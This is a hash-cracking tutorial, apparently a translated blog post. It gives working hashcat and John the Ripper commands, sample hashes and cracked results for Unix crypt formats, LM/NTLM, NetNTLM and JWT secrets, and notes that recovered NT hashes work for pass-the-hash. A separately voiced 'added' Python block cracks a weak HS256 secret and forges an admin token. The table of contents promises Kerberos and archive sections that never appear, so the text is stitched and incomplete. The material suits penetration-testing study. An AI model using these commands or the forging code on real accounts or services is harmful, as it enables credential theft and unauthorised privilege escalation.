Hash Cracking Techniques
iker · posted from Beijing · Historical picks · 1614 views · 2024-11-05 02:50

Prerequisites

First, some questions:

  • Is a hash a form of encryption, and is it reversible?
  • In /etc/shadow, what is the difference between hashes starting with $1 and those starting with $6?
  • Apart from MD5, which other hash algorithms are in use?
  • How does Nacos protect user passwords, and can those hashes be cracked?
  • How are hash algorithms used in each stage of Kerberos authentication?
  • In which Kerberos stage do AS-REP Roasting and Kerberoasting happen, respectively?
  • How can credentials be recovered from a capture of domain traffic with hash cracking?
  • ...

Goals of this article:

  • 15 common hash types and how to crack them
  • 3 domain (Active Directory) hash types and how to crack them
  • NTLM authentication: attack traffic analysis, hash assembly and cracking
  • Kerberos authentication: attack traffic analysis, hash assembly and cracking

Table of contents:

  • Identifying the hash algorithm - Hash Identify
  • Cracking common hashes - Hash Cracking with X
    • Basic structure - Hash Format
    • Generation and cracking - Generate and Cracking
      • md5 - (no prefix)
      • traditional des - (no prefix)
      • md5crypt - $1
      • bcrypt - $2a / $2b
      • sha512crypt - $6
      • yescrypt - $y
      • LM
      • NTLM
      • NetNTLMv1
      • NetNTLMv2
      • JWT(JSON Web Token)
      • PKZIP - $pkzip2
      • WinZip - $zip2
      • 7-Zip - $7z
      • RAR5 - $rar5
    • Attack traffic analysis - Traffic Analysis
      • NTLM - Pass the Hash
      • NetNTLMv2 - Responder capture (LLMNR/NBT-NS poisoning)
  • Cracking Kerberos hashes - Hash Cracking with Kerberos
    • Kerberos setup - Infrastructure
      • Building a Kerberos lab
      • Kerberos authentication flow
      • Preconditions for AS-REP Roasting
      • Preconditions for Kerberoasting
    • Basic structure - Hash Format
    • Examples and cracking - Examples and Cracking
      • Kerberos AS-REQ Pre-Auth - $krb5pa
      • Kerberos AS-REP - $krb5asrep
      • Kerberos TGS-REP - $krb5tgs
    • Attack traffic analysis - Traffic Analysis
      • Kerberos AS-REQ Pre-Auth - $krb5pa
      • Kerberos AS-REP - $krb5asrep
      • Kerberos TGS-REP - $krb5tgs

Before reading the first part, Cracking common hashes - Hash Cracking with X, you should be familiar with:

  • Basic usage of Hashcat or John the Ripper
  • The NTLM authentication flow
  • How Responder works (LLMNR/NBT-NS/mDNS poisoning to capture NetNTLM responses)

Before reading the second part, Cracking Kerberos hashes - Hash Cracking with Kerberos, you should be familiar with:

  • Basic usage of Hashcat or John the Ripper
  • The Kerberos authentication flow
  • Preconditions and exploitation of AS-REP Roasting
  • Preconditions and exploitation of Kerberoasting

Identifying the hash algorithm - Hash Identify

Tools shipped with Kali (hash-identifier is interactive and reads the hash from its prompt; hashid takes it as an argument):

# (kali) hash-identifier
hash-identifier
> 5f4dcc3b5aa765d61d8327deb882cf99

# (kali) hashid
hashid 698d51a19d8a121ce581499d7b701668

Other open-source tools (identification is by length and prefix only, so an unsalted 32-hex-char value may be MD5, NTLM, MD4, or something else; confirm with the source context):

# https://github.com/HashPals/Name-That-Hash
# [INSTALL] pip install name-that-hash
nth --text '5f4dcc3b5aa765d61d8327deb882cf99'

# https://github.com/noraj/haiti
# [INSTALL] gem install haiti-hash
haiti 698d51a19d8a121ce581499d7b701668

Cracking common hashes - Hash Cracking with X

Basic structure - Hash Format

Some common hash algorithms and their prefix/structure:

# Sample password hash encoding strings
DES has no prefix (13-character crypt(3) string: 2-character salt + 11-character hash)
$1: md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5)
$2: bcrypt $2*$, Blowfish (Unix)
$2a / $2b / $2y: revisions of the same bcrypt format, all cracked as plain bcrypt (hashcat -m 3200); hashcat's bcryptmd5 / bcryptsha256 modes are separate pre-hashed variants, not what these prefixes mean
$sha1: Juniper/NetBSD sha1crypt
$5: sha256crypt $5$, SHA256 (Unix)
$6: sha512crypt $6$, SHA512 (Unix)
$y: yescrypt (default for /etc/shadow on Debian 11+ and Kali)
$apr1: Apache $apr1$ MD5, md5apr1, MD5 (APR)
-----
eyJ: JWT (JSON Web Token); "eyJ" is base64url for '{"', the start of the JSON header
-----
$pkzip2: PKZIP
$zip2: WinZip   
$7z: 7-Zip
$RAR3: RAR3-hp
$rar5: RAR5

Example hashes crackable with Hashcat:

# https://hashcat.net/wiki/doku.php?id=example_hashes
# The password for all example hashes is hashcat.
# [DES crypt] hashcat
48c/R8JAv757A
# [MD5] hashcat
8743b52063cd84097a65d1633f5c74f5
# [MD5 crypt] hashcat
$1$28772684$iEwNOgGugqO9.bIz5sk8k/
# [bcrypt] hashcat
$2a$05$LhayLxezLhK1LhWvKxCyLOj0j1u.Kj0jZ0pEmm134uzrQlFvQJLF6
# [SHA-1, raw and unsalted (not SHA-1 crypt)] hashcat
b89eaac7e61417341b710b727768294d0e6a277b
# [SHA-256 crypt] hashcat
$5$rounds=5000$GX7BopJZJxPc/KEK$le16UF8I2Anb.rOrn22AUPWvzUETDGefUmAV8AZkGcD
# [SHA-512 crypt] hashcat
$6$52450745$k5ka2p8bFuSmoVT1tzOyyuaREkkKBcCNqoDKzYiJL9RaE8yMnPgh2XzzF0NDrUhgrcLwg78xs1w5pJiypEdFX/
# [Apache $apr1$ MD5]
$apr1$71850310$gh9m4xcAn3MGxogwX/ztb.
# [LM] hashcat (password length <= 7; in the full 32-char form below the second half aad3b435b51404ee is the constant for an empty half)
299bd128c1101fd6
299BD128C1101FD6AAD3B435B51404EE
# [NTLM] hashcat
b4b9b02e6f09a9bd760f388b67351e2b
# [Net-NTLMv1] hashcat
# username::hostname:LM response:NTLM response:challenge
u4-netntlm::kNS:338d08f8e26de93300000000000000000000000000000000:9526fb8c23a90751cdd619b6cea564742e1e4bf33006ba41:cb8086049ec4736c
# [NetNTLMv2] hashcat
# username::domain:challenge:HMAC-MD5:blob
admin::N46iSNekpT:08ca45b7d7ea58ee:88dcbe4446168966a153a0064958dac6:5c7830315c7830310000000000000b45c67103d07d7b95acd12ffa11230e0000000052920b85f78d013c31cdb3b92f5d765c783030
# [JWT] hashcat
eyJhbGciOiJIUzI1NiJ9.eyIzNDM2MzQyMCI6NTc2ODc1NDd9.f1nXZ3V_Hrr6ee-AFCTLaHRnrkiKmio2t3JqwL32guY
# [PKZIP]
ez_sign.zip:$pkzip2$3*1*1*0*8*24*6f5f*8c57*96efce3ba8f42df5100275b25b34189c24506195b837da194a398d37debe7c6fa32dce9a*1*0*8*24*97cf*716c*6e1f48559e23d1efab2d8d181d788dbe0466eb53ae2a4dea03b6582a49defcee8b9a644f*2*0*6a*9b*224ac2c9*59665*2f*8*6a*224a*86eb*cac9ee9362cc24b1f6f29b67f073f86ea4457b208ef8843c5205d31792505c15b30c7031b7fa7c0e355067a0e5757b4976cd8584eff13c42156377ccdb92d7fb7438d562d48ffd97173d888a610a00d48bc4e2a7664b3c3b79c104e1f10430fdf2ead69cf7983dbb6c65*$/pkzip2$::ez_sign.zip:ez_sign/part3.zip, ez_sign/part2.pcapng, ez_sign/part1.jpg:ez_sign.zip
# [WinZip]
$zip2$*0*3*0*a56cb83812be3981ce2a83c581e4bc4f*4d7b*24*9af41ff662c29dfff13229eefad9a9043df07f2550b9ad7dfc7601f1a9e789b5ca402468*694b6ebb6067308bedcd*$/zip2$
# [7-Zip]
$7z$2$19$0$$16$efaf9d6baa7904b3b036e662682ab20b$179887464$160$153$dd4c47f4760d13ba9c787f5164359c4364e5521a5827540667d3fc77275b6aaebebd3e830534fdd04a56d50381117dfb83ed5d33258aca9aefa2466e62b566341f3b836902162b344ea186904a5ce2cbbb82bf46d697498f2ebd9350a77e311756323c8d8984522e78cf7edcb1384bdd51f080819718ca20c948cd980aec5a85777e457099ede588c82b1778a3a145eb7ae4ddd6034b7f197cea34b8d29f6b8f$155$00
# [RAR5]
$rar5$16$eba9202c2dde739ad93698c92884a65a$15$5486d4941a022f8f847b23421ff5f006$8$2a736b197dcada46

Example hashes crackable with John the Ripper:

# https://openwall.info/wiki/john/sample-hashes
# or command: john --list=format-details
# [DES crypt] password 
rEK1ecacw.7.c
# [BSDI crypt] password
_J9..K0AyUubDrfOgO4s
# [bigcrypt] passphrase
qiyh4XPJGsOZ2MEAyLkfWqeQ
# [crypt16] passphrase
qi8H8R7OM4xMUNMPuRAZxlY.
# [MD5 crypt] password
$1$O3JMY.Tw$AdLnLjQ/5jXF9.MTp3gHv/
# [SHA-256 crypt] password
$5$MnfsQ4iN$ZMTppKN16y/tIsUYs/obHlhdP.Os80yXhTurpBMUbA5
$5$rounds=5000$usesomesillystri$KqJWpanXZHKq2BOB43TSaYhEWsQ1Lr5QNyPCDH/Tp.6
# [SHA-512 crypt] password
$6$zWwwXKNj$gLAOoZCjcr8p/.VgV/FkGC3NX7BsXys3KHYePfuIGMNjY83dVxugPYlxVg/evpcVEJLT/rSwZcDMlVVf/bhf.1
$6$rounds=5000$usesomesillystri$D4IrlXatmP7rx3P3InaxBeoomnAihCKRVQP22JZ6EY47Wc6BkroIuUUBOov1i.S5KPgErtP/EN5mcO.ChWQW21 
# [bcrypt] password
$2a$05$bvIG6Nmid91Mu9RcmmWZfO5HJIMCT8riNW0hEp8f6/FuA2/mHZFpe    
# [LM] passphrase
# Default on: Windows NT, 2000, XP; Mac OS X 10.3
# Also supported on: Windows Vista, 7; Samba
855c3697d9979e78ac404c4ba2c66533        
# [NTLM] passphrase
# Windows NT, 2000, XP, Vista, 7; Samba
$NT$7f8fe03093cc84b267b109625f6bbf4b

# Others
# [yescrypt] password
$y$j9T$RCrZ03NIvNEhIXXHAK1P51$4SMUXZVAELCH8PYvw92vVMXqQAo6.vKffKzFIP9ayz2

Generation and cracking - Generate and Cracking

md5 - (no prefix)

# Calculate an MD5 hash of a string (-n: do not hash the trailing newline)
# Linux
echo -n <string> | md5sum
echo -n <string> | openssl md5

# Calculate an MD5 hash of a file
# Windows powershell
PS C:\> Get-FileHash file.txt -Algorithm md5
# Windows git bash
$ md5sum file.txt
# Windows certutil
C:\> certutil -hashfile <filename> md5
# Linux
md5sum <filename>

# Crack with Hashcat (-m 0 raw MD5, -a 0 straight wordlist attack)
echo 21232f297a57a5a743894a0e4a801fc3 > hashes.txt
# --force makes hashcat ignore its own warnings (e.g. an unsupported OpenCL runtime in a VM); drop it on a real GPU setup
hashcat --force -a 0 -m 0 hashes.txt -o result.txt /opt/metasploit-framework/embedded/framework/data/wordlists/default_pass_for_services_unhashes.txt

# Crack with John the Ripper
john --format=raw-md5 hashes.txt
john --format=raw-md5 hashes.txt --show
# the "?" is the (empty) username field, since hashes.txt has no user:hash prefix
?:admin

traditional des - (no prefix)

# [DES crypt] password
..UZoIyj/Hy/c

# Generate with perl (traditional DES crypt: 2-character salt, only the first 8 characters of the password are used)
perl -le 'print crypt("password", "salt")'
sa3tHJ3/KuYvI
-----
perl -le 'print crypt("password", "")'
..UZoIyj/Hy/c

# Crack with Hashcat
echo -n 'sa3tHJ3/KuYvI' > hashes.txt
-----
hashcat -m 1500 -a 0 -o result.txt hashes.txt ~/HackTools/Dict/password_10w.txt --force
-----
cat result.txt
sa3tHJ3/KuYvI:password

# Crack with John the Ripper (a 13-character DES crypt string is auto-detected as descrypt)
john --wordlist=~/HackTools/Dict/password_10w.txt hashes.txt
-----
john --show hashes.txt
?:password

md5crypt - $1

# Hash Format for md5crypt 
$1$[salt]$[hash]
# [MD5 crypt] hashcat
$1$28772684$iEwNOgGugqO9.bIz5sk8k/
# [MD5 crypt] password
$1$O3JMY.Tw$AdLnLjQ/5jXF9.MTp3gHv/

# Generate with openssl
openssl passwd -1 123456
$1$ca4bbVqc$nh/Nb7Fs/.M7EXI1zywPH.
-----
openssl passwd -1 wh0am!   
$1$xjLfSILk$k.XlGRrzUkO6/HVxeLZ7O1

# Crack with Hashcat
echo -n '$1$ca4bbVqc$nh/Nb7Fs/.M7EXI1zywPH.' > hashes.txt
-----
hashcat -m 500 -a 0 -o result.txt hashes.txt ~/HackTools/Dict/password_10w.txt --force
-----
cat result.txt
$1$ca4bbVqc$nh/Nb7Fs/.M7EXI1zywPH.:123456

# Crack with John the Ripper, format: md5crypt
john --wordlist=~/HackTools/Dict/password_10w.txt hashes.txt
-----
john --show hashes.txt
?:123456

bcrypt - $2a / $2b

# Hash Format for bcrypt
$2b$[cost]$[22 character salt][31 character hash]
# for example:
$2a$10$N9qo8uLOickgx2ZMRZoMyeIjZAgcfl7p92ldGxad68LJZdL17lhWy 
\__/\/ \____________________/\_____________________________/ 
alg cost         salt                   hash
# $2a vs $2b vs $2y: revisions of one algorithm, all cracked as plain bcrypt (hashcat -m 3200, john --format=bcrypt).
# $2b (OpenBSD 5.5) fixed a length wraparound in $2a for passwords over 255 bytes; $2y is PHP's crypt_blowfish fix for a $2a high-bit character bug.
# cost is log2 of the key-setup iterations: cost 12 = 4096 iterations, which is why bcrypt cracks far slower than md5crypt.

# [bcrypt] password
$2a$05$bvIG6Nmid91Mu9RcmmWZfO5HJIMCT8riNW0hEp8f6/FuA2/mHZFpe

# Generate with python
-----
# pip install bcrypt
import bcrypt
# bcrypt works on bytes (and only uses the first 72 bytes of the password)
password = b'123456'
# Generate a random salt; the default work factor is 12 (bcrypt.gensalt(rounds=12))
salt = bcrypt.gensalt()
# Hash the password; the result string embeds prefix, cost and salt
hashed = bcrypt.hashpw(password, salt)
# print the salt
print("Salt :")
print(salt)
# print the hash
print("Hashed")
print(hashed)
'''
Salt :
b'$2b$12$o5UtOmL9ZnN7X0kDJo57o.'
Hashed
b'$2b$12$o5UtOmL9ZnN7X0kDJo57o.p1oOSld18QmKSJ7SS9WoFG6fGKFI3oa'
'''
-----

# Crack with Hashcat
echo -n '$2b$12$o5UtOmL9ZnN7X0kDJo57o.p1oOSld18QmKSJ7SS9WoFG6fGKFI3oa' > hashes.txt
-----
hashcat -m 3200 -a 0 -o result.txt hashes.txt ~/HackTools/Dict/password_10w.txt --force
-----
cat result.txt
$2b$12$o5UtOmL9ZnN7X0kDJo57o.p1oOSld18QmKSJ7SS9WoFG6fGKFI3oa:123456

# Crack with John the Ripper, format: bcrypt
john --wordlist=~/HackTools/Dict/password_10w.txt hashes.txt
-----
john --show hashes.txt
?:123456

sha512crypt - $6

# Hash Format for sha512crypt
$6$[salt]$[hash]
# or, with an explicit iteration count (default 5000):
$6$rounds=[N]$[salt]$[hash]
# for example, in /etc/shadow:
# root/123456
root:$6$PCjFvrAA/NnyKdMp$7fs0mn0nUuQ0jjtKZVAyf8TCBIx5MUvwC2ftkRwh2q7PYSuKpnv4wVu63zX.oCJ/RG2v4gDbNMCDAV1dIjCuE.:18631:0:::::
# [salt] PCjFvrAA/NnyKdMp
# [hash] 7fs0mn0nUuQ0jjtKZVAyf8TCBIx5MUvwC2ftkRwh2q7PYSuKpnv4wVu63zX.oCJ/RG2v4gDbNMCDAV1dIjCuE.

# [SHA-512 crypt] password
$6$zWwwXKNj$gLAOoZCjcr8p/.VgV/FkGC3NX7BsXys3KHYePfuIGMNjY83dVxugPYlxVg/evpcVEJLT/rSwZcDMlVVf/bhf.1 
# [SHA-512 crypt] 123456
$6$1$j.74UuJkzzPKyD/cMaD1PygML3gwSnec87gsickCF6sO5D8UuHzTbK0DtUbI1257QK03GEHXpdFFmjPewVtaI0

# Generate with openssl (omit -salt and openssl picks a valid random salt by itself)
# Note: the crypt(3) salt alphabet is [./0-9A-Za-z]; `openssl rand -base64` can emit '+' or '/', which openssl passwd accepted here but libxcrypt-based tools may reject
openssl passwd -6 -salt $(openssl rand -base64 12) "123456"
$6$1UgW2MWWR+0rK5Zp$NIRQzRzUBgzPpf5rdikXHkw7Bu8JQa2xTuGkhBorqrRhbAwUKC2m9IecFqXMO5tQJhB/fWfmQ6TPYoxHzuP3r1

# Crack with Hashcat
cat hashes.txt
$6$1$j.74UuJkzzPKyD/cMaD1PygML3gwSnec87gsickCF6sO5D8UuHzTbK0DtUbI1257QK03GEHXpdFFmjPewVtaI0
-----
hashcat -m 1800 -a 0 -o result.txt hashes.txt ~/HackTools/Dict/password_10w.txt --force
-----
cat result.txt
$6$1$j.74UuJkzzPKyD/cMaD1PygML3gwSnec87gsickCF6sO5D8UuHzTbK0DtUbI1257QK03GEHXpdFFmjPewVtaI0:123456

# Crack with John the Ripper, format: sha512crypt
john --wordlist=~/HackTools/Dict/password_10w.txt hashes.txt
-----
john --show hashes.txt
?:123456

yescrypt - $y

# [yescrypt] password
$y$j9T$RCrZ03NIvNEhIXXHAK1P51$4SMUXZVAELCH8PYvw92vVMXqQAo6.vKffKzFIP9ayz2

# Crack with John the Ripper (Hashcat has no yescrypt mode; --format=crypt delegates to the system libcrypt, which on Debian/Kali supports yescrypt but is slow)
unshadow /etc/passwd /etc/shadow > unshadowed.txt
-----
cat unshadowed.txt
-----
root:$y$j9T$8wKCupG0/Pt7hVej1wsWz.$zzxCMDnyulKdgTaE0kkwvLMKi2CsjYIqGoG8j7boki0:0:0:root:/root:/usr/bin/zsh
...
kali:$y$j9T$35R2okXivtPCejiMOlWmv.$FrJeZy0Gb.XtZC.Qarb4ecGhrjc7aZ.hQGSCKXgVMR9:1000:1000:kali,,,:/home/kali:/usr/bin/zsh
# if yescrypt, use --format=crypt
# root:root
# kali:kali
john --format=crypt --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt
-----
john unshadowed.txt --show
root:root:0:0:root:/root:/usr/bin/zsh
kali:kali:1000:1000:kali,,,:/home/kali:/usr/bin/zsh

LM

# [LM] hashcat (password length <= 7)
299bd128c1101fd6
299BD128C1101FD6AAD3B435B51404EE
# [LM] passphrase
# Default on: Windows NT, 2000, XP; Mac OS X 10.3
# Also supported on: Windows Vista, 7; Samba
855c3697d9979e78ac404c4ba2c66533

# Crack with Hashcat, -a 0 for dictionary
# -m 3000 works on 16-hex-char halves; a full 32-char LM hash is split into two halves that crack independently (at most 7 characters each)
hashcat -a 0 -m 3000 --force '299BD128C1101FD6AAD3B435B51404EE'  password_10w.txt --show
299bd128c1101fd6aad3b435b51404ee:HASHCAT
# Crack with Hashcat, -a 3 for brute force (LM upper-cases the password before hashing, so a ?l mask still finds it and the result is shown upper-cased)
hashcat -a 3 -m 3000 'F0D412BD764FFE81AAD3B435B51404EE' '?l?l?l?l?l' --show
f0d412bd764ffe81aad3b435b51404ee:ADMIN

# Crack with John the Ripper
john --format=lm hashes.txt --show
?:PASSPHRASE

NTLM

# [NTLM] passphrase
# Windows NT, 2000, XP, Vista, 7; Samba
$NT$7f8fe03093cc84b267b109625f6bbf4b

# Generate online (test values only; never paste real credentials or hashes into a third-party site)
https://codebeautify.org/ntlm-hash-generator
https://github.com/gchq/CyberChef
# Generate with python (pip install passlib); NT hash = MD4(UTF-16LE(password)), unsalted
from passlib.hash import nthash
password = "password"
ntlm_hash = nthash.hash(password)
print(f"NTLM hash for '{password}' is: {ntlm_hash}")
-----
NTLM hash for 'password' is: 8846f7eaee8fb117ad06bdd830b7586c

# Crack with Hashcat
echo -n '8846f7eaee8fb117ad06bdd830b7586c' > hashes.txt
-----
# -a 3 with no mask runs hashcat's built-in default mask; give an explicit mask (e.g. '?l?l?l?l?l?l?l?l') to bound the keyspace
hashcat -m 1000 -a 3 -o result.txt hashes.txt --force
# or
hashcat -m 1000 -a 0 -o result.txt hashes.txt ~/HackTools/Dict/password_10w.txt --force
-----
cat result.txt
8846f7eaee8fb117ad06bdd830b7586c:password

# Crack with John the Ripper
john --wordlist=~/HackTools/Dict/password_10w.txt --format=NT hashes.txt
-----
john --show --format=NT hashes.txt
?:password

NetNTLMv1

# Hashcat NetNTLMv1 / NetNTLMv1+ESS (-m 5500)
# username::hostname:LM response:NT response:server challenge
# with ESS (as in the example below) the LM response field carries the 8-byte client challenge padded with zeros
u4-netntlm::kNS:338d08f8e26de93300000000000000000000000000000000:9526fb8c23a90751cdd619b6cea564742e1e4bf33006ba41:cb8086049ec4736c
# John the ripper NetNTLMv1 – NTLMv1 C/R MD4 DES [ESS MD5]
$NETNTLM$1122334455667788$B2B2220790F40C88BCFF347C652F67A7C4A70D3BEBD70233
username:$NETNTLM$1122334455667788$B2B2220790F40C88BCFF347C652F67A7C4A70D3BEBD70233
username:$NETNTLM$1122334455667788$B2B2220790F40C88BCFF347C652F67A7C4A70D3BEBD70233:::::::

# Crack online
# The NT response is three DES encryptions of the 8-byte challenge under keys cut from the NT hash, so the NT hash itself can be recovered by a DES key search with no wordlist at all (crack.sh does this; with a fixed challenge of 1122334455667788 precomputed tables apply). The recovered NT hash is directly usable for pass-the-hash.
https://crack.sh/

# Crack with Hashcat
hashcat -m 5500 -a 0 hashes.txt password_10w.txt --show
u4-netntlm::kNS:338d08f8e26de93300000000000000000000000000000000:9526fb8c23a90751cdd619b6cea564742e1e4bf33006ba41:cb8086049ec4736c:hashcat

# Crack with John the Ripper
john --format=netntlm hashes.txt --show
?:cory21

NetNTLMv2

# Hashcat NetNTLMv2 (-m 5600)
# username::domain:server challenge:NTProofStr (HMAC-MD5):blob
# NTProofStr = HMAC-MD5(NTLMv2 key, server challenge || blob), NTLMv2 key = HMAC-MD5(NT hash, UTF-16LE(UPPER(username) || domain)); the blob holds the client challenge, timestamp and AV pairs
# Nothing here is reversible to the NT hash, so a captured NetNTLMv2 response can only be cracked (or relayed live), never passed
admin::N46iSNekpT:08ca45b7d7ea58ee:88dcbe4446168966a153a0064958dac6:5c7830315c7830310000000000000b45c67103d07d7b95acd12ffa11230e0000000052920b85f78d013c31cdb3b92f5d765c783030
# John the ripper NetNTLMv2 – NTLMv2 C/R MD4 HMAC-MD5
$NETNTLMv2$NTLMV2TESTWORKGROUP$1122334455667788$07659A550D5E9D02996DFD95C87EC1D5$0101000000000000006CF6385B74CA01B3610B02D99732DD000000000200120057004F0052004B00470052004F00550050000100200044004100540041002E00420049004E0043002D0053004500430055005200490000000000
username:$NETNTLMv2$NTLMV2TESTWORKGROUP$1122334455667788$07659A550D5E9D02996DFD95C87EC1D5$0101000000000000006CF6385B74CA01B3610B02D99732DD000000000200120057004F0052004B00470052004F00550050000100200044004100540041002E00420049004E0043002D0053004500430055005200490000000000
username:$NETNTLMv2$NTLMV2TESTWORKGROUP$1122334455667788$07659A550D5E9D02996DFD95C87EC1D5$0101000000000000006CF6385B74CA01B3610B02D99732DD000000000200120057004F0052004B00470052004F00550050000100200044004100540041002E00420049004E0043002D0053004500430055005200490000000000:::::::

# Crack with Hashcat
hashcat -m 5600 -a 0 hashes.txt password_10w.txt --show
ADMIN::N46iSNekpT:08ca45b7d7ea58ee:88dcbe4446168966a153a0064958dac6:5c7830315c7830310000000000000b45c67103d07d7b95acd12ffa11230e0000000052920b85f78d013c31cdb3b92f5d765c783030:hashcat

# Crack with John the Ripper
john --format=netntlmv2 hashes.txt --show
?:password

JWT (JSON Web Token)

# Recommended dictionary
~/HackTools/Dict/jwt.secrets.list

# JWT Format
# base64url(Header).base64url(Payload).base64url(Signature); for HS256, Signature = HMAC-SHA256(secret, Header.Payload), so the secret can be attacked offline, eg:
# eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.kXSdJhhUKTJemgs8O0rfIJmUaxoSIDdClL_OPmaC7Eo

# Crack with Hashcat
hashcat -m 16500 -a 0 jwt.txt ~/HackTools/Dict/rockyou.txt --show
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.kXSdJhhUKTJemgs8O0rfIJmUaxoSIDdClL_OPmaC7Eo:password

# Crack with John the Ripper
john jwt.txt --wordlist=~/HackTools/Dict/rockyou.txt --format=HMAC-SHA256
john jwt.txt --show
?:password

# https://github.com/Sjord/jwtcrack
python crackjwt.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc ~/HackTools/Dict/rockyou.txt
-----
Cracking JWT eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc
0it [00:00, ?it/s]
Found secret key: 123456

# https://github.com/ticarpi/jwt_tool
python jwt_tool.py -d ~/HackTools/Dict/rockyou.txt eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc 
-----
=====================
Decoded Token Values:
=====================

Token header values:
[+] typ = "JWT"
[+] alg = "HS256"

Token payload values:
[+] data = "{"username":"admin","role":"admin"}"

----------------------
JWT common timestamps:
iat = IssuedAt
exp = Expires
nbf = NotBefore
----------------------

# https://github.com/brendan-rius/c-jwt-cracker
./jwtcrack eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.cAOIAifu3fykvhkHpbuhbvtH807-Z2rI1FS3vX1XMjE
Secret is "Sn1f"

# https://github.com/mazen160/jwt-pwn
python jwt-cracker.py -jwt eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc -w ~/HackTools/Dict/rockyou.txt
-----
[info] Loaded wordlist.
[info] starting brute-forcing.
[#] KEY FOUND: 123456
-----
python jwt-decoder.py "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJqd3QiOiJwd24ifQ.4pOAm1W4SHUoOgSrc8D-J1YqLEv9ypAApz27nfYP5L4"
# Generates a new JWT that is signed with HS256 with the same payload value of a provided JWT.
python jwt-any-to-hs256.py "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJqd3QiOiJwd24ifQ.4pOAm1W4SHUoOgSrc8D-J1YqLEv9ypAApz27nfYP5L4"
# Generates a new unsigned JWT with the same payload value of a provided JWT.
python jwt-mimicker.py "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJqd3QiOiJwd24ifQ.4pOAm1W4SHUoOgSrc8D-J1YqLEv9ypAApz27nfYP5L4"

# https://github.com/lmammino/jwt-cracker
# npm install --global jwt-cracker
jwt-cracker "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.TJVA95OrM7E2cBab30RMHrHDcEfxjoYZgeFONFh7HgQ" "abcdefghijklmnopqrstuwxyz"
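The secret search that all of the tools above perform is the same few lines, and once the secret is known the useful next step is re-signing a modified payload. The block below is an added example, not code from the article or from any of the listed tools. It is standard-library Python; the token, its claims and the five-word wordlist are constructed here around the deliberately weak secret 123456, so nothing in it comes from a real deployment.

```python
# Added example (not from the original article or any of the tools above):
# the HS256 check the JWT crackers perform, plus what you do with the
# recovered secret. Standard library only; the token is constructed here
# with a deliberately weak secret so the run is self-contained.
import base64
import hashlib
import hmac
import json


def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def b64url_decode(text: str) -> bytes:
    # JWTs drop the base64 padding; add it back before decoding
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_hs256(header: dict, payload: dict, secret: bytes) -> str:
    """header.payload.signature with signature = HMAC-SHA256(secret, header.payload)."""
    parts = [b64url_encode(json.dumps(obj, separators=(",", ":")).encode()) for obj in (header, payload)]
    signing_input = ".".join(parts)
    sig = hmac.new(secret, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url_encode(sig)


def crack_hs256(token: str, candidates):
    """Dictionary attack on the secret; returns the secret or None.

    Only HS256 is attacked: an RS256 token has no shared secret to guess, and
    a token with alg=none has no signature at all (a different bug).
    """
    head, body, sig = token.split(".")
    if json.loads(b64url_decode(head)).get("alg") != "HS256":
        raise ValueError("not an HS256 token")
    signing_input = f"{head}.{body}".encode()
    target = b64url_decode(sig)
    for secret in candidates:
        guess = hmac.new(secret.encode(), signing_input, hashlib.sha256).digest()
        if hmac.compare_digest(guess, target):
            return secret
    return None


def forge(token: str, secret: str, **claims) -> str:
    """Re-sign the token with changed claims; accepted by any server using that secret."""
    head, body, _ = token.split(".")
    payload = json.loads(b64url_decode(body))
    payload.update(claims)
    return sign_hs256(json.loads(b64url_decode(head)), payload, secret.encode())


def verify_hs256(token: str, secret: str) -> bool:
    """Server-side check; the same comparison crack_hs256 repeats per candidate."""
    return crack_hs256(token, [secret]) == secret


# Constructed token: a low-privilege session signed with the weak secret "123456".
WORDLIST = ["password", "secret", "qwerty", "123456", "letmein"]
SAMPLE_TOKEN = sign_hs256({"alg": "HS256", "typ": "JWT"},
                          {"username": "guest", "role": "user", "iat": 1700000000}, b"123456")


def demo():
    """Recover the secret, then mint an admin token: (secret, forged token, forged claims)."""
    secret = crack_hs256(SAMPLE_TOKEN, WORDLIST)
    forged = forge(SAMPLE_TOKEN, secret, role="admin")
    return secret, forged, json.loads(b64url_decode(forged.split(".")[1]))


if __name__ == "__main__":
    print(demo())
```

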